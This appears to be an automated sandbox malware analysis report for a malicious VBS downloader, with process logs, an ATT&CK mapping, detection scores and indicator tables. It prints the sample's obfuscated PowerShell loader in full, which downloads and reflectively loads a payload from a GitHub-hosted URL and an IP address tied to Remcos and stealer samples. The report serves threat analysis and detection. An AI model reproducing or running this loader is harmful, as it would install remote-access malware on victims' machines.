Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("powershell -command $Codigo = 'KCdDRW11cmwgJysnPSAnKyc5NCcrJ2xodHRwczovJys", "0", "false");
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('CEmurl '+'= '+'94'+'lhttps:/'+'/raw.githubus'+'erconte'+'nt.'+'com/No'+'Det'+'ectOn/N'+'oDe'+'tec'+'tO'+'n/'+'refs/heads/main/De'+'tahNoth-V.txt94l; CEmba'+'s'+'e'+'64Content'+' = ('+'Ne'+'w-Ob'+'ject S'+'yste'+'m.'+'Net'+'.Web'+'Client).Downlo'+'ad'+'S'+'t'+'ring(CE'+'murl);'+' CEm'+'bi'+'n'+'ar'+'yContent = [Sys'+'tem.C'+'on'+'v'+'e'+'r'+'t]::Fr'+'omBa'+'se64'+'St'+'ring(C'+'E'+'m'+'base64Con'+'te'+'n'+'t); CEmas'+'sembl'+'y '+'= [R'+'eflectio'+'n.Assem'+'bly]:'+':L'+'oad(CEm'+'binar'+'yC'+'onte'+'nt); ['+'d'+'n'+'l'+'ib'+'.IO.'+'Hom'+'e]:'+':VAI(ju6'+'tx'+'t.TTSSR'+'/0'+'05/'+'7'+'41.03'+'1.271'+'.701'+'//'+':'+'ptthju6, ju6desativadoju6, ju6desativ'+'a'+'doju6'+', ju6d'+'esat'+'iva'+'doju6, ju6RegA'+'smj'+'u'+'6'+', j'+'u6ju6,'+'ju6ju6'+')').REplAcE('CEm','$').REplAcE(([chAR]106+[chAR]117+[chAR]54),[stRInG][chAR]34).REplAcE('94l',[stRInG][chAR]39) | &( $ENv:CoMspEC[4,24,25]-jOiN'')"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFE16652817 push esp; iretd 2_2_00007FFE1665281A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFE16647937 push ebx; retf 4_2_00007FFE1664793A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFE166464FF push esp; iretd 4_2_00007FFE16646502
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFE166408FB push E95B5E1Ch; ret 4_2_00007FFE16640909
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFE16717531 push eax; ret 4_2_00007FFE16717532
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1831
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1630
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4406
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5396
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6948 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5624 | Thread sleep count: 4406 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5664 | Thread sleep count: 5396 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2084 | Thread sleep time: -14757395258967632s >= -30000s
Source: powershell.exe, 00000004.00000002.2420242779.000002074328B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('CEmurl '+'= '+'94'+'lhttps:/'+'/raw.githubus'+'erconte'+'nt.'+'com/No'+'Det'+'ectOn/N'+'oDe'+'tec'+'tO'+'n/'+'refs/heads/main/De'+'tahNoth-V.txt94l; CEmba'+'s'+'e'+'64Content'+' = ('+'Ne'+'w-Ob'+'ject S'+'yste'+'m.'+'Net'+'.Web'+'Client).Downlo'+'ad'+'S'+'t'+'ring(CE'+'murl);'+' CEm'+'bi'+'n'+'ar'+'yContent = [Sys'+'tem.C'+'on'+'v'+'e'+'r'+'t]::Fr'+'omBa'+'se64'+'St'+'ring(C'+'E'+'m'+'base64Con'+'te'+'n'+'t); CEmas'+'sembl'+'y '+'= [R'+'eflectio'+'n.Assem'+'bly]:'+':L'+'oad(CEm'+'binar'+'yC'+'onte'+'nt); ['+'d'+'n'+'l'+'ib'+'.IO.'+'Hom'+'e]:'+':VAI(ju6'+'tx'+'t.TTSSR'+'/0'+'05/'+'7'+'41.03'+'1.271'+'.701'+'//'+':'+'ptthju6, ju6desativadoju6, ju6desativ'+'a'+'doju6'+', ju6d'+'esat'+'iva'+'doju6, ju6RegA'+'smj'+'u'+'6'+', j'+'u6ju6,'+'ju6ju6'+')').REplAcE('CEm','$').REplAcE(([chAR]106+[chAR]117+[chAR]54),[stRInG][chAR]34).REplAcE('94l',[stRInG][chAR]39) | &( $ENv:CoMspEC[4,24,25]-jOiN'')"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcddrw11cmwgjysnpsankyc5nccrj2xodhrwczovjysnl3jhdy5naxrodwj1cycrj2vyy29udgunkydudc4nkydjb20vtm8nkydezxqnkydly3rpbi9ojysnb0rljysndgvjjysnde8nkydulycrj3jlznmvagvhzhmvbwfpbi9ezscrj3rhae5vdggtvi50ehq5ngw7ienfbwjhjysncycrj2unkyc2nenvbnrlbnqnkycgpsaojysntmunkyd3lu9ijysnamvjdcbtjysnexn0zscrj20ujysntmv0jysnlldlyicrj0nsawvudckurg93bmxvjysnywqnkydtjysndccrj3jpbmcoq0unkydtdxjsktsnkycgq0vtjysnymknkydujysnyxinkyd5q29udgvudca9ifttexmnkyd0zw0uqycrj29ujysndicrj2unkydyjysndf06okzyjysnb21cyscrj3nlnjqnkydtdccrj3jpbmcoqycrj0unkydtjysnymfzzty0q29ujysndgunkydujysndck7ienfbwfzjysnc2vtymwnkyd5iccrjz0gw1inkydlzmxly3rpbycrj24uqxnzzw0nkydibhldoicrjzpmjysnb2fkkenfbscrj2jpbmfyjysneumnkydvbnrljysnbnqpoybbjysnzccrj24nkydsjysnawinkycusu8ujysnsg9tjysnzv06jysnolzbsshqdtynkyd0eccrj3quvfrtu1inkycvmccrjza1lycrjzcnkyc0ms4wmycrjzeumjcxjysnljcwmscrjy8vjysnoicrj3b0dghqdtysigp1nmrlc2f0axzhzg9qdtysigp1nmrlc2f0axynkydhjysnzg9qdtynkycsigp1nmqnkydlc2f0jysnaxzhjysnzg9qdtysigp1nljlz0enkydzbwonkyd1jysnnicrjywgaicrj3u2anu2lccrj2p1nmp1nicrjyknks5srxbsqwnfkcddrw0nlcckjykuukvwbefjrsgow2noqvjdmta2k1tjaefsxtexnytby2hbul01ncksw3n0uklur11by2hbul0znckuukvwbefjrsgnotrsjyxbc3rssw5hxvtjaefsxtm5ksb8icyoicrftny6q29nc3bfq1s0ldi0ldi1xs1qt2lojycp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('cemurl '+'= '+'94'+'lhttps:/'+'/raw.githubus'+'erconte'+'nt.'+'com/no'+'det'+'ecton/n'+'ode'+'tec'+'to'+'n/'+'refs/heads/main/de'+'tahnoth-v.txt94l; cemba'+'s'+'e'+'64content'+' = ('+'ne'+'w-ob'+'ject s'+'yste'+'m.'+'net'+'.web'+'client).downlo'+'ad'+'s'+'t'+'ring(ce'+'murl);'+' cem'+'bi'+'n'+'ar'+'ycontent = [sys'+'tem.c'+'on'+'v'+'e'+'r'+'t]::fr'+'omba'+'se64'+'st'+'ring(c'+'e'+'m'+'base64con'+'te'+'n'+'t); cemas'+'sembl'+'y '+'= [r'+'eflectio'+'n.assem'+'bly]:'+':l'+'oad(cem'+'binar'+'yc'+'onte'+'nt); ['+'d'+'n'+'l'+'ib'+'.io.'+'hom'+'e]:'+':vai(ju6'+'tx'+'t.ttssr'+'/0'+'05/'+'7'+'41.03'+'1.271'+'.701'+'//'+':'+'ptthju6, ju6desativadoju6, ju6desativ'+'a'+'doju6'+', ju6d'+'esat'+'iva'+'doju6, ju6rega'+'smj'+'u'+'6'+', j'+'u6ju6,'+'ju6ju6'+')').replace('cem','$').replace(([char]106+[char]117+[char]54),[string][char]34).replace('94l',[string][char]39) | &( $env:comspec[4,24,25]-join'')"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK matrix (techniques listed per tactic; the bracketed numbers are the superscript counts shown in the original matrix):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Scripting [221]; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Command and Scripting Interpreter [11]; Exploitation for Client Execution [1]; PowerShell [3]; Cron; Launchd; Scheduled Task
Persistence: Scripting [221]; DLL Side-Loading [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection [11]; DLL Side-Loading [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion [21]; Process Injection [11]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [2]; Software Packing [1]; DLL Side-Loading [1]
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery [1]; Process Discovery [1]; Virtualization/Sandbox Evasion [21]; Application Window Discovery [1]; File and Directory Discovery [1]; System Information Discovery [12]
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel [1]; Ingress Tool Transfer [3]; Non-Application Layer Protocol [3]; Application Layer Protocol [4]; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Source | Detection | Scanner | Label
2THp7fwNQD.vbs | 6% | Virustotal |
2THp7fwNQD.vbs | 5% | ReversingLabs | Win32.Trojan.Generic
No Antivirus matches
Source | Detection | Scanner | Label
raw.githubusercontent.com | 0% | Virustotal |
Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://aka.ms/pscore6 | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://oneget.org | 0% | URL Reputation | safe
http://www.apache.org/licenses/LICENSE-2.0 | 0% | Virustotal |
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt | 6% | Virustotal |
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Virustotal |
https://raw.githubusercontent.com | 0% | Virustotal |
http://107.172.130.147 | 7% | Virustotal |
http://107.172.130.147/500/RSSTT.txt | 1% | Virustotal |
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt94l; | 1% | Virustotal |
http://microsoft.co | 1% | Virustotal |
http://raw.githubusercontent.com | 0% | Virustotal |
https://github.com/Pester/Pester | 1% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
raw.githubusercontent.com | 185.199.111.133 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt | false | | unknown
http://107.172.130.147/500/RSSTT.txt | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000004.00000002.2386759505.000002072CAD4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2401373905.000002073B092000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000004.00000002.2386759505.000002072C762000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000004.00000002.2386759505.000002072B243000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2386759505.000002072C762000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://raw.githubusercontent.com | powershell.exe, 00000004.00000002.2386759505.000002072B243000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2386759505.000002072C70C000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://107.172.130.147 | powershell.exe, 00000004.00000002.2386759505.000002072B44F000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000004.00000002.2386759505.000002072B243000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2386759505.000002072C762000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://microsoft.co | powershell.exe, 00000004.00000002.2420242779.00000207432D7000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://go.micro | powershell.exe, 00000004.00000002.2386759505.000002072C02D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt94l; | powershell.exe, 00000004.00000002.2386759505.000002072B243000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://contoso.com/ | powershell.exe, 00000004.00000002.2401373905.000002073B092000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000004.00000002.2386759505.000002072CAD4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2401373905.000002073B092000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000004.00000002.2401373905.000002073B092000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://raw.githubusercontent.com | powershell.exe, 00000004.00000002.2386759505.000002072C712000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://contoso.com/Icon | powershell.exe, 00000004.00000002.2401373905.000002073B092000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://raw.githubusercont | powershell.exe, 00000004.00000002.2386759505.000002072C70C000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://aka.ms/pscore6 | powershell.exe, 00000002.00000002.2431492450.000001F9DA8F1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.2431492450.000001F9DA90A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2386759505.000002072B021000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.2431492450.000001F9DA937000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2386759505.000002072B021000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000004.00000002.2386759505.000002072B243000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2386759505.000002072C762000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://oneget.org | powershell.exe, 00000004.00000002.2386759505.000002072C762000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
107.172.130.147 | unknown | United States | 36352 | AS-COLOCROSSINGUS | false
185.199.111.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | false
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1523825
Start date and time:2024-10-02 05:22:15 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 29s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:8
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:2THp7fwNQD.vbs
renamed because original name is a hash value
Original Sample Name:2da99963acf87f71dc500922da2a8510fbb87c7f11bd5c165a602fbc7c76b177.vbs
Detection:MAL
Classification:mal100.expl.evad.winVBS@6/5@1/2
EGA Information:Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 12
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .vbs
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 5048 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 6652 because it is empty
• Not all processes were analyzed; report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
23:23:15 | API Interceptor | 37x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
107.172.130.147 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtf | Get hash | malicious | PureLog Stealer | Browse | 107.172.130.147/460/LKiGG.txt
107.172.130.147 | AGMETIGA zapytanie ofertowe.xls | Get hash | malicious | PureLog Stealer | Browse | 107.172.130.147/460/LKiGG.txt
107.172.130.147 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.31506.1346.rtf | Get hash | malicious | Remcos | Browse | 107.172.130.147/500/RSSTT.txt
185.199.111.133 | R183nzNa89.exe | Get hash | malicious | Unknown | Browse |
185.199.111.133 | Shipping Documents.xls | Get hash | malicious | Remcos | Browse |
185.199.111.133 | Scan Order and Specification 01-10- 2024.docx | Get hash | malicious | Remcos | Browse |
185.199.111.133 | DRAFT_PO.vbs | Get hash | malicious | Unknown | Browse |
185.199.111.133 | file.exe | Get hash | malicious | XWorm, Xmrig | Browse |
185.199.111.133 | SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | Get hash | malicious | AsyncRAT, DcRat | Browse |
185.199.111.133 | https://rajkamalkanna.github.io/Facebook-Login-Page/ | Get hash | malicious | HTMLPhisher | Browse |
185.199.111.133 | https://vinitk1509.github.io/NETFLIX | Get hash | malicious | HTMLPhisher | Browse |
185.199.111.133 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtf | Get hash | malicious | Remcos | Browse |
185.199.111.133 | dvswiftsend_240917122612_9331095243.docx.doc | Get hash | malicious | Remcos | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
raw.githubusercontent.com | iJEK0xwucj.vbs | Get hash | malicious | Unknown | Browse | 185.199.108.133
raw.githubusercontent.com | mitec_purchase_order_PDF (1).vbs | Get hash | malicious | PXRECVOWEIWOEI Stealer | Browse | 185.199.108.133
raw.githubusercontent.com | 00#U2800.exe | Get hash | malicious | Unknown | Browse | 185.199.110.133
raw.githubusercontent.com | asegurar.vbs | Get hash | malicious | Remcos | Browse | 185.199.110.133
raw.githubusercontent.com | dcsegura.vbs | Get hash | malicious | AsyncRAT, DcRat | Browse | 185.199.110.133
raw.githubusercontent.com | asegura.vbs | Get hash | malicious | Remcos | Browse | 185.199.108.133
raw.githubusercontent.com | R183nzNa89.exe | Get hash | malicious | Unknown | Browse | 185.199.110.133
raw.githubusercontent.com | hHNfR2jxEo.exe | Get hash | malicious | PureLog Stealer, XWorm | Browse | 185.199.109.133
raw.githubusercontent.com | tCNVKM4mkt.exe | Get hash | malicious | PureLog Stealer, XWorm | Browse | 185.199.108.133
raw.githubusercontent.com | R183nzNa89.exe | Get hash | malicious | Unknown | Browse | 185.199.111.133
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
FASTLYUS | iJEK0xwucj.vbs | Get hash | malicious | Unknown | Browse | 185.199.108.133
FASTLYUS | mitec_purchase_order_PDF (1).vbs | Get hash | malicious | PXRECVOWEIWOEI Stealer | Browse | 185.199.108.133
FASTLYUS | https://unpaidrefund.top/view/mygov | Get hash | malicious | HTMLPhisher | Browse | 151.101.194.137
FASTLYUS | https://sanbernardinoscounty.telcom-info.com/ | Get hash | malicious | HtmlDropper | Browse | 151.101.2.137
FASTLYUS | http://t1.global.clubavolta.com/r/?id=h53ebcb4b,29506a5f,2988ba3e&e=cDE9UkVEX0dMX0xveWFsdHlMYXVuY2hTb2x1cy1OT0NPTS1BTEwtMDExMDIwMjQtMV9YWCZwMj1kNzEwNWE1Zi00NjE3LWVmMTEtOWY4OS0wMDBkM2EyMmNlYTE&s=MLotNdk8aEH7W1636YhgxIdQC5od3UWYqTZw3tm9630 | Get hash | malicious | Unknown | Browse | 151.101.194.137
